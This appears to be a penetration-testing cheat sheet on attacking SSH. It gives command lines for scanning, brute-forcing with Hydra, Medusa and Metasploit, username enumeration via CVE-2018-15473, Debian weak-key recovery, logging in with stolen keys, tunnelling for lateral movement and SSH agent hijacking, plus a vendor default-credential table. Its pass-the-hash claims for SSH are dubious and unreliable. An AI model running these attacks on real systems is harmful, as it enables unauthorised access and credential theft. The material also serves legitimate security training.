# SSH- Port 22

{% tabs %}
{% tab title="Support VeryLazyTech 🎉" %}

* Become VeryLazyTech [**member**](https://buymeacoffee.com/verylazytech/membership)**! 🎁**
* **Follow** us on:
  * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.**
  * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.**
  * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
* Visit our [**shop** ](https://buymeacoffee.com/verylazytech/extras)for e-books and courses.  📚
* Support us and [**buy me a coffee**](https://buymeacoffee.com/verylazytech)**. ☕**
  {% endtab %}
  {% endtabs %}

## Basic Information <a href="#basic-information" id="basic-information"></a>

**SSH (Secure Shell or Secure Socket Shell)** is a network protocol that enables a secure connection to a computer over an unsecured network. It is essential for maintaining the confidentiality and integrity of data when accessing remote systems.

**Default port:** 22

***

## **Example Attack Workflow**

### **Reconnaissance:**

* Use Nmap to scan for open SSH ports. [#port-scanning](#port-scanning "mention")
* Identify the SSH version using `nmap -sV`. [#service-enumeration](#service-enumeration "mention")
* Attempt to grab the SSH banner for more info (`nc` or `telnet`). [#banner-grabbing](#banner-grabbing "mention")

### **Vulnerability Assessment:**

* Use `ssh-audit` to find weak configurations. [#public-key-authentication-weaknesses](#public-key-authentication-weaknesses "mention")
* Search for CVEs related to the detected SSH version. [#check-for-known-vulnerabilities](#check-for-known-vulnerabilities "mention")

### **Brute-Force or Key Exploitation:**

* If password authentication is used, attempt brute-forcing with Hydra or Medusa. [#brute-force](#brute-force "mention")
* If SSH keys are exposed, use the key to authenticate directly. [#using-exposed-ssh-keys-to-authenticate-directly](#using-exposed-ssh-keys-to-authenticate-directly "mention")

### **Post-Exploitation:**

* Set up SSH tunnels for lateral movement. [#setting-up-ssh-tunnels-for-lateral-movement](#setting-up-ssh-tunnels-for-lateral-movement "mention")
* Hijack existing SSH sessions if possible. [#hijacking-existing-ssh-sessions](#hijacking-existing-ssh-sessions "mention")

***

## **Reconnaissance**

### **Port Scanning**

Use **Nmap** to identify SSH ports (default is 22).

```
nmap -p22 <target-ip>
```

### **Service Enumeration**

Check the SSH service version to identify potential vulnerabilities.

```
nmap -sV -p22 <target-ip>
```

### **Banner Grabbing**

Extract the SSH banner to see the service version and OS information.

```
nc <target-ip> 22
```

***

## **Vulnerability Assessment**

### **Check for Known Vulnerabilities**

* Once you have the SSH version from the previous steps, you can search for known vulnerabilities (CVEs) in public databases like **CVE Details**, or automate the process using **Nmap NSE scripts**.

```
nmap --script sshv1 -p22 <target-ip>
nmap -p22 <ip> --script ssh2-enum-algos # Retrieve supported algorythms 
nmap -p22 <ip> --script ssh-hostkey --script-args ssh_hostkey=full # Retrieve weak keys
nmap -p22 <ip> --script ssh-auth-methods --script-args="ssh.user=root" # Check authentication methods
```

### **Brute force**

* Use **Hydra**, **Medusa** to attempt brute force attacks.

```
hydra -l <username> -P <password-list> <target-ip> ssh
```

```
medusa -h <target-ip> -u <username> -P <password-list> -M ssh
```

### **Advanced Brute Force Techniques**

In more advanced penetration testing scenarios, attackers may leverage captured password hashes instead of brute-forcing plaintext passwords. This technique is known as **Pass the Hash (PTH)**, and it allows attackers to authenticate using password hashes directly, bypassing traditional brute force limitations. Two common tools used for this purpose in the SSH context are **CrackMapExec** and **pth-ssh**.

#### **Parallel SSH Brute-Forcing with CrackMapExec**

**CrackMapExec (CME)** is a post-exploitation tool that can automate tasks across an entire network, including parallel brute-forcing of SSH login credentials. CME allows for simultaneous brute force attacks on multiple targets while leveraging password hashes in addition to plaintext passwords.

```bash
crackmapexec ssh <target-ip> -u <username> -p <password>
```

* `<target-ip>`: The IP address of the target machine.
* `-u <username>`: The username to attempt authentication with.
* `-p <password>`: The password or password list to use in the brute force attempt.

#### **Pass-the-Hash with pth-ssh**

**Pass the Hash (PTH)** attacks leverage stolen password hashes instead of trying to guess or brute-force plaintext passwords. **pth-ssh** is a tool specifically designed for SSH-based PTH attacks. It allows you to authenticate to an SSH service using a captured password hash, effectively bypassing password brute-force rate limiting or lockout mechanisms.

```bash
pth-ssh <username>@<target-ip> <password-hash>
```

* `<username>`: The username to attempt authentication with.
* `<target-ip>`: The IP address of the target machine.
* `<password-hash>`: The hash of the password that will be used to authenticate (instead of the plaintext password).

#### **Why Use Pass-the-Hash (PTH) in SSH Attacks?**

* **Stealthier than Brute-Force Attacks:** Brute force attempts can be noisy and trigger security alarms, whereas PTH attacks are often less detectable, as you're directly using a valid authentication hash.
* **Bypass Rate Limits:** Many SSH servers enforce rate limits or lockout periods after failed login attempts. Using PTH avoids these protections since the correct hash bypasses the normal authentication process.
* **Post-Exploitation:** In scenarios where you've already compromised a machine and retrieved password hashes (e.g., `/etc/shadow` file on Linux), PTH allows you to pivot across the network more quickly.

#### **Where to Find Password Hashes?**

* **Post-Exploitation Tools**: After initial access to a system, tools like **Mimikatz**, **John the Ripper**, or **Hashcat** can extract password hashes from memory, disk, or network traffic.
* **Linux Systems**: On Linux, password hashes are often stored in `/etc/shadow` (although the file is root-only).
* **Windows Systems**: Password hashes are stored in the SAM (Security Account Manager) database, and tools like **Mimikatz** can extract these for later use in PTH attacks.

### **Public Key Authentication Weaknesses**

* If SSH key-based authentication is used, weak keys or poorly secured key files can be an entry point. Tools like **ssh-audit** can help find weaknesses in SSH configurations and exposed keys.

  ```bash
  ssh-audit <target-ip>
  ```

***

## Exploit Vulnerabilities

**Exploiting Vulnerabilities (e.g., CVE-2018-15473)**

Certain vulnerabilities like **CVE-2018-15473** (username enumeration) allow attackers to discover valid usernames by analyzing SSH responses. Exploiting outdated ciphers or protocol flaws can also lead to successful attacks.

### **Metasploit for SSH Login Brute-Force:**

```bash
use auxiliary/scanner/ssh/ssh_login
set RHOSTS <target-ip>
set USERNAME <username>
set PASS_FILE <path-to-password-list>
run
```

* `use auxiliary/scanner/ssh/ssh_login`: This module attempts to brute-force SSH credentials.
* `RHOSTS <target-ip>`: The target's IP address.
* `USERNAME <username>`: Username to brute-force.
* `PASS_FILE <path-to-password-list>`: File containing passwords.

### **Metasploit for SSH Version Enumeration:**

```bash
use auxiliary/scanner/ssh/ssh_version
set RHOSTS <target-ip>
run
```

* `use auxiliary/scanner/ssh/ssh_version`: This module scans and detects the SSH version running on the target.
* `RHOSTS <target-ip>`: The IP address of the target system.

### **Additional Exploits:**

#### **CVE-2018-15473** allows username enumeration:

```bash
python ssh_enum.py <target-ip> -U <user-list>
```

This Python script attempts to enumerate valid usernames by analyzing SSH responses during login attempts.

#### **CVE-2008-0166 (OpenSSL Debian Random Number Generator Vulnerability)**

This is an older but critical vulnerability that affected Debian-based systems using OpenSSL, allowing attackers to guess private keys.

If the system is vulnerable to this, SSH keys can be recreated based on weak random numbers.

1. Download the key list for vulnerable Debian OpenSSL versions.

   ```bash
   git clone https://github.com/g0tmi1k/debian-ssh.git
   ```
2. Search for the corresponding weak key.

   ```bash
   cd debian-ssh
   ./find_key.py <target-ip> <username>
   ```

***

## Default Credentials <a href="#default-credentials" id="default-credentials"></a>

<table><thead><tr><th>Vendor</th><th width="329">Usernames</th><th>Passwords</th></tr></thead><tbody><tr><td>APC</td><td>apc, device</td><td>apc</td></tr><tr><td>Brocade</td><td>admin</td><td>admin123, password, brocade, fibranne</td></tr><tr><td>Cisco</td><td>admin, cisco, enable, hsa, pix, pnadmin, ripeop, root, shelladmin</td><td>admin, Admin123, default, password, secur4u, cisco, Cisco, _Cisco, cisco123, C1sco!23, Cisco123, Cisco1234, TANDBERG, change_it, 12345, ipics, pnadmin, diamond, hsadb, c, cc, attack, blender, changeme</td></tr><tr><td>Citrix</td><td>root, nsroot, nsmaint, vdiadmin, kvm, cli, admin</td><td>C1trix321, nsroot, nsmaint, kaviza, kaviza123, freebsd, public, rootadmin, wanscaler</td></tr><tr><td>D-Link</td><td>admin, user</td><td>private, admin, user</td></tr><tr><td>Dell</td><td>root, user1, admin, vkernel, cli</td><td>calvin, 123456, password, vkernel, Stor@ge!, admin</td></tr><tr><td>EMC</td><td>admin, root, sysadmin</td><td>EMCPMAdm7n, Password#1, Password123#, sysadmin, changeme, emc</td></tr><tr><td>HP/3Com</td><td>admin, root, vcx, app, spvar, manage, hpsupport, opc_op</td><td>admin, password, hpinvent, iMC123, pvadmin, passw0rd, besgroup, vcx, nice, access, config, 3V@rpar, 3V#rpar, procurve, badg3r5, OpC_op, !manage, !admin</td></tr><tr><td>Huawei</td><td>admin, root</td><td>123456, admin, root, Admin123, Admin@storage, Huawei12#$, HwDec@01, hwosta2.0, HuaWei123, fsp200@HW, huawei123</td></tr><tr><td>IBM</td><td>USERID, admin, manager, mqm, db2inst1, db2fenc1, dausr1, db2admin, iadmin, system, device, ufmcli, customer</td><td>PASSW0RD, passw0rd, admin, password, Passw8rd, iadmin, apc, 123456, cust0mer</td></tr><tr><td>Juniper</td><td>netscreen</td><td>netscreen</td></tr><tr><td>NetApp</td><td>admin</td><td>netapp123</td></tr><tr><td>Oracle</td><td>root, oracle, oravis, applvis, ilom-admin, ilom-operator, nm2user</td><td>changeme, ilom-admin, ilom-operator, welcome1, oracle</td></tr><tr><td>VMware</td><td>vi-admin, root, hqadmin, vmware, admin</td><td>vmware, vmw@re, hqadmin, default</td></tr></tbody></table>

***

## **Using Exposed SSH Keys to Authenticate Directly**

If you have access to an exposed or stolen SSH private key (`id_rsa`), you can use it to authenticate directly to the SSH service of a target system.

**Step-by-Step Instructions:**

1. **Obtain the SSH Private Key:** The private key typically has the filename `id_rsa`. Ensure it has the correct permissions (600) before attempting to use it.
2. **Check and Set Permissions:** The SSH client requires that the private key file has restricted permissions (only the owner can read it). Set the correct permissions:

   ```bash
   chmod 600 id_rsa
   ```
3. **SSH Into the Target Using the Exposed Key:** Use the following command to SSH into the target using the private key.

   ```bash
   ssh -i id_rsa <username>@<target-ip>
   ```

   * `id_rsa`: The private key file you obtained.
   * `<username>`: The username for the SSH login.
   * `<target-ip>`: The IP address or hostname of the target system.

   **Example:**

   ```bash
   ssh -i id_rsa root@192.168.1.10
   ```
4. **Verify Access:** If the key is valid and properly configured on the target, you should now have SSH access to the target system without needing to brute force credentials.

***

## **Post-Exploitation**

### **Setting Up SSH Tunnels for Lateral Movement**

SSH tunneling allows you to create an encrypted tunnel through the compromised machine to reach other machines on an internal network. This is useful for pivoting in post-exploitation scenarios.

**Step-by-Step Instructions:**

1. **SSH Local Port Forwarding:** This allows you to forward a local port on your machine to a port on another machine via the SSH server. It’s useful when you want to access an internal service.

   **Command:**

   ```bash
   ssh -L <local-port>:<internal-ip>:<internal-port> <username>@<target-ip>
   ```

   * `<local-port>`: The port on your local machine that you want to use.
   * `<internal-ip>`: The internal IP address of the machine behind the SSH server you want to reach.
   * `<internal-port>`: The port on the internal machine that you want to access.
   * `<username>@<target-ip>`: Credentials and IP address of the compromised SSH server.

   **Example:**

   ```bash
   ssh -L 8080:10.10.10.5:80 root@192.168.1.10
   ```

   This command forwards your local port `8080` to `port 80` on the internal machine with IP `10.10.10.5`. After this, you can access the internal server by going to `http://localhost:8080` in your browser.
2. **SSH Remote Port Forwarding:** This method allows you to expose a port from your local machine to the target network. It’s useful for reverse shell setups.

   **Command:**

   ```bash
   ssh -R <remote-port>:<local-ip>:<local-port> <username>@<target-ip>
   ```

   **Example:**

   ```bash
   ssh -R 9000:localhost:22 root@192.168.1.10
   ```

   This will allow you to connect to your local SSH service (`port 22`) from the target machine via `port 9000`.
3. **Dynamic SSH Tunneling with SOCKS Proxy:** You can create a dynamic SSH tunnel using a SOCKS proxy, which allows you to route traffic through the SSH server to any machine inside the network.

   **Command:**

   ```bash
   ssh -D <local-port> <username>@<target-ip>
   ```

   **Example:**

   ```bash
   ssh -D 8080 root@192.168.1.10
   ```

   This creates a SOCKS proxy on `localhost:8080`. You can configure your browser or proxy-aware tool (like Burp Suite) to route traffic through this proxy.

***

### **Hijacking Existing SSH Sessions**

In certain post-exploitation scenarios, it may be possible to hijack existing SSH sessions. This typically involves identifying and using SSH agent forwarding or hijacking a socket used by the active SSH session.

**Step-by-Step Instructions:**

1. **Check for Active SSH Sessions:** After gaining access to a system, you can check for active SSH sessions by looking for SSH processes.

   **Command:**

   ```bash
   ps aux | grep ssh
   ```

   This will show the active SSH connections and the processes tied to them. You can also check the `/proc` directory for further details.
2. **Check for SSH Agent Forwarding:** If SSH agent forwarding is enabled, you may be able to impersonate the user and reuse their SSH session. Check for SSH agent sockets in the `/tmp/` directory.

   **Command:**

   ```bash
   env | grep SSH_AUTH_SOCK
   ```

   If you find an `SSH_AUTH_SOCK`, it indicates the presence of an SSH agent. The agent stores private keys in memory, and you can use these keys to authenticate to other systems.
3. **Hijacking the SSH Agent:** If you find the SSH agent socket, you can use it to impersonate the user.

   **Command:**

   ```bash
   ssh-add -l
   ```

   This will list the keys that are currently available in the agent. If keys are listed, you can use them to access other systems.
4. **Using Hijacked SSH Agent for Pivoting:** With the SSH agent hijacked, you can SSH to other systems without needing the actual private key, as long as the agent is authorized on those systems.

   **Command:**

   ```bash
   ssh -A <username>@<target-ip>
   ```

   **Example:**

   ```bash
   ssh -A admin@10.10.10.5
   ```

   This forwards your hijacked SSH agent to the new target system, allowing you to use the stored keys for authentication.

{% embed url="<https://buymeacoffee.com/verylazytech/e/301419>" %}